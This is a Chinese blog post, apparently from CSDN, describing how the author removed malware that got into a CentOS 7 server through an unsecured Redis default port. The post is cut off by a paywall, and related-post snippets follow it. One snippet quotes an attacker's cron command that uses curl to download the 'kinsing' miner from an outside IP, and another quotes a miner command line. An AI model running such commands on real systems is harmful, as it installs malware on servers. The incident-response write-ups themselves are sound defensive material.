记一次centos7因redis默认端口被恶意植入病毒解决

原创 已于 2022-08-26 16:40:02 修改 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维 #centos #安全

于 2022-08-26 16:38:38 首次发布
本文记录了一次由于未配置Redis,导致CentOS7服务器被病毒利用默认端口植入大量文件的过程。通过查找并删除病毒文件、定位并结束恶意进程、禁用自启动脚本,成功清除病毒并提醒读者注意Redis的安全配置。

centos7中的redis因为使用默认端口被植入病毒的解决

起因是今天远程进入centos7的图形根目录特别慢,一看finalshell已经读取了几万个文件,就觉得不对头,linux的文件系统根目录除了那几个文件夹以外不是自己添加的不可能有文件的,结果使用ls -a一看几万个 .r.*格式的文件就知道中病毒了请添加图片描述

解决过程。。。。

我先是使用

find / -name “.r.*” | xargs rm -rfv

删除了根目录的这些文件,但是发现一刷新有新的文件生成,肯定被插入进程脚本了,之前因为慢我已经重启了一次了,所以我肯定开机自启的文件里面肯定有这个脚本添加的自启文件,于是我先使用代码

systemctl list-unit-files

查看有没有异常的自启动

之前看到的知乎大佬的centos7病毒分析的帖子链接: 挖矿病毒分析(centos7)
发现了一个叫[scan]的自启文件和这个大佬帖子里的一个病毒一模一样,然后对比一下我之前备份的centos7服务器的文件发现这个是新加入的不知道干嘛的程序
进入到它的目录/usr/share中找到了它最后使用

ps -ef

找到了它的进程,当时确定了它不是系统进程,关掉不会影响系统所以找到了它的进程,使用

kill -9 进程号

结束了它的进程,然后去根目录删除了生成的文件发现没有新文件生成了,确定那就是病毒脚本,没说的直接删除/usr/share中的文件再删除自

最低0.47元/天 解锁文章
SQLINGBING
关注
一次centos中挖矿病毒处理经过
a345203172的专栏
10-08 1995
环境:centos7.6 挖矿进程:rabiit 1、先关闭无用对外端口 (例如redis端口,mysql端口等),限制可以ssh登录的ip地址,可以用last查看近期远程登录的用户,确认是否存在可疑IP或者用户 2、查看定时任务情况(这个可以查看/var/log/cron文件,是否存在可疑定时任务执行日志),查看可以定时任务的启动位置,删除可疑定时任务 crontab -e /var/spool/cron/ /etc/crontab /etc/cr...
redis未设置密码被植入挖矿脚本
QQ657205470的博客
03-06 1672
无意间发现启动redis的时候cpu瞬间拉到了100%,主要就是zzh和newinit.sh两个脚本。百度了一下说是被植入了挖矿脚本,是因为redis没有设置密码。参考着搜到的博客处理了问题,但是系统好多命令和配置都被破坏了,还是有必要重装。删除 ia 参数 :chattr -ia zzh ,提示没有权限。然后再回到 etc 目录下,执行 chattr -ia zzh。再执行 cat /etc/crontab ,发现有一条定时任务。在网上搜索 zzh,发现 zzh 是一种挖矿脚本。删除定时任务和这个脚本。
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 1035
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
linux服务器Centos7病毒
on the way . . .
03-23 3054
Background 用的华为的弹性云服务器,直到这一次,之前已经出现过三四次,想到这一次也不会是最后一次录下,防止因为同样的问题再次中毒。 1、2022-03-23 中毒后部分系统命令不能用。有的能用的也会夹杂一些其他的错误信息。 ERROR: ld.so: object '/usr/local/lib/uncompress.so' from /etc/ld.so.preload cannot be preloaded: ignored. 中毒效果图 症状分析 由上图可以看出,加载/
CentOS 服务器Redis 遭遇挖矿程序 minerd 入侵事件
Dancen的专栏
07-18 3817
事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服务还健在。 执行: uptime 发现,服务器的负载非常高。 执行: top 发现,有一个叫做minerd的进程占用了几乎所有cpu资源。 百度“centos minerd”,搜索结果显
排查通过服务器redis 的漏洞植入 pnscan 病毒进行挖矿
pkyShare 的博客
05-17 991
1 描述   最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时。最后连接上去了,输入命令 uptime ,显示如下图:   我的服务器是 1 核心的,信息显示有另一个用户,而且后面三个参数都超过了 1,表示当前 CPU 严重过载。   再在云服务器管理页面查看可视化界面,如下图:   没遇到过这种情况,然后就提交了工单叫云服务器人员帮忙处理。 2 结果与分析   结果是攻击者通过 redis安全漏洞植入
centos 系统服务器被黑客攻击怎么办?
求是
03-05 1778
1.先把sshd登录这块给他搞定 #!/bin/bash rm -rf /home/shell/ip_list cat /var/log/secure | grep "Failed password for" | awk '{print$(NF-3)}' | sort | uniq -c > /home/shell/ip_list #cat /var/log/secure | grep...
恶意植入vConsol
最新发布
01-21
对于 Redis 被感染的情况,在 CentOS 7 中由于使用默认配置而导致端口暴露从而遭受攻击[^1],应当立即停止受影响的服务进程,并清理残留的数据和设置。 ```bash sudo systemctl stop redis.service ``` 接着删除...
一次被注入挖矿程序kdevtmpfi解决
但行好事,莫问前程
02-05 5301
前言 发现自己服务器资源使用异常,cpu使用率100%,内存使用也很多,且有陌生的进程。那很有可能是被入侵植入了挖矿程序 解决问题 遇到这种问题切忌惊慌失措,一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源 一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.
一次愚蠢的Redis配置导致Linux服务器恶意攻击
u012708900的博客
12-23 952
起因 之前Linux服务器上面一直启的Redis单机,并设置了密码。也没出现过问题。对安全这方面也不太敏感。 前天重新搭建了Redis集群(一主两从三哨兵),都只是做了最简单的配置,期初master配置中是有密码的,但是在配置slave时,没有添加masterauth配置项(因为无知,- -!),导致主从复制一直失败,索性就把master中的requirepass给注释掉了。再次重启主从复制成功了,哨兵的配置也成功启动,发现模拟故障转移也莫得问题,就认为万事大吉了。 经过 然而昨天中午的时候,收到了阿里云的
Centos7 安装redis
Soul space of Jamon_Wang
02-13 574
安装 gcc 编译 首先看一下是否有安装gcc gcc -v 因为后面安装redis的时候需要编译,所以事先得先安装gcc编译。阿里云主机已经默认安装了 gcc,如果是自己安装的虚拟机,那么需要先安装一下 gcc: yum install gcc-c++ 下载 redis 有两种方式下载安装包,一种是去官网上下载(https://redis.io),然后将安装包考到 centos 中,另种方法是直接使用 wget 来下载: wget http://download.redis.io/rel
Centos上由于redis漏洞被攻击
半僧
12-06 1825
早上一直收到腾讯云报警,查看了下: 有个yam程序,占用大量CPU!!! 真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的? 于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的
CentOS中kdevtmpfsi病毒
jinglinggg的专栏
12-06 1478
CentOS中kdevtmpfsi病毒,几日的查杀,最终失败!
Centos7病毒[tsm][kswapd0] 被黑造成cpu过高,杀死自有排查
qq_25831105的博客
01-04 828
Centos7病毒排查[tsm][kswapd0] tsm被黑录–录 less /var/log/secure|grep ‘Accepted’ 查询登陆情况,一般会有异常ip登陆,而且会安装公钥在你机器上,后续会一直通过公钥登陆你的机器,你修改密码都没用,得清理 ~/.ssh/authorized_keys 2.pwdx *** (通过top查到命令进程,然后通过该命令查询源文件路径,然后删除他) 3.查看crontab -e 里面还有关联文件,会自启动,一并删除,并删除定时计划任务,然后
centos出现病毒问题 解决思路
ADCadc123456789的博客
07-17 1242
利用top 查看cpu 占用情况于异常情况 现在常见病毒 (挖矿) 此时cpu 占用率载99% 左右 找到对应pid 方式一: lsof -p pid进程号 查看可以文件 进行病毒排查 方式而 ps aux| grep COMMAND编号 删除 找到得文件 查看 定时任务 crontab -l 列出定时任务 crontab -e 删除异常定时任务 vim /etc/crontab cd /etc/cron.d 次目录下有两个文件 vim 0hourly vim sysstat.
Centos7病毒排查[tsm][kswapd0]
weixin_45552912的博客
02-24 559
看一下主机的资源使用情况 先按照腾讯云文档给的建议走走 腾讯云文档url:https://cloud.tencent.com/document/product/296/9604 == last 命令无异常 less /var/log/secure|grep ‘Accepted’ 查了一个ip,为美国的 看来是被攻击了,还是用root ssh上来的。----可能我的root密码太简单了吧 找找病毒在哪里 netstat -ntlp 貌似没啥问题呢 netstat -antlp 7. 在这里看到了..
如何反黑客后门程序
LLand520的博客
10-06 2636
前言   那什么,额不是最近国庆吗?因为疫情的缘故,我们都在家中,但发生了这么一件事,看到标题你应该知道是什么了,我被黑了!!!咳咳咳,不能说是被黑了,只能说是我下载了一个后门软件,对后门软件,比如说灰鸽子,流光这种,那边的黑客远程控制了我,我知道,这是最基础的软件了。但是我还是中了,最后,我的账号,密码都被盗取。很难受对吧,所以我写个这个文章。 如何防护这种后门,木马?   很容易,不去下载就好了。哎,你这不是废话吗?咳咳,最好的方法,360。360?你在说什么?360不是毒瘤吗?360云大脑知道吗?虽然
crypto和pnscan云挖矿病毒导致CPU100%
Jarvan的博客
08-13 770
经过这次安全事件,我应该去学点基础的安全防护技巧,比如,不能用root用户操作Linux系统,不能用账户和密码登录账户,禁用它,然后用ssh密钥登录。比如使用相关的安全工具去防护它。
Finalshell安全吗?Xshell怎么样?
热门推荐
风高秋月白,雨霁晚霞红
06-22 1万+
Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。
CentOS7安装Redis及配置session共享
CentOS7环境下安装Redis是一个简单的过程,首先需要确保系统已经安装了GCC编译器,因为Redis的编译过程依赖于它。下载Redis的源代码,例如Redis-3.2.1.tar.gz,将其上传至/usr/local/redis-src/目录并解压缩。进入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值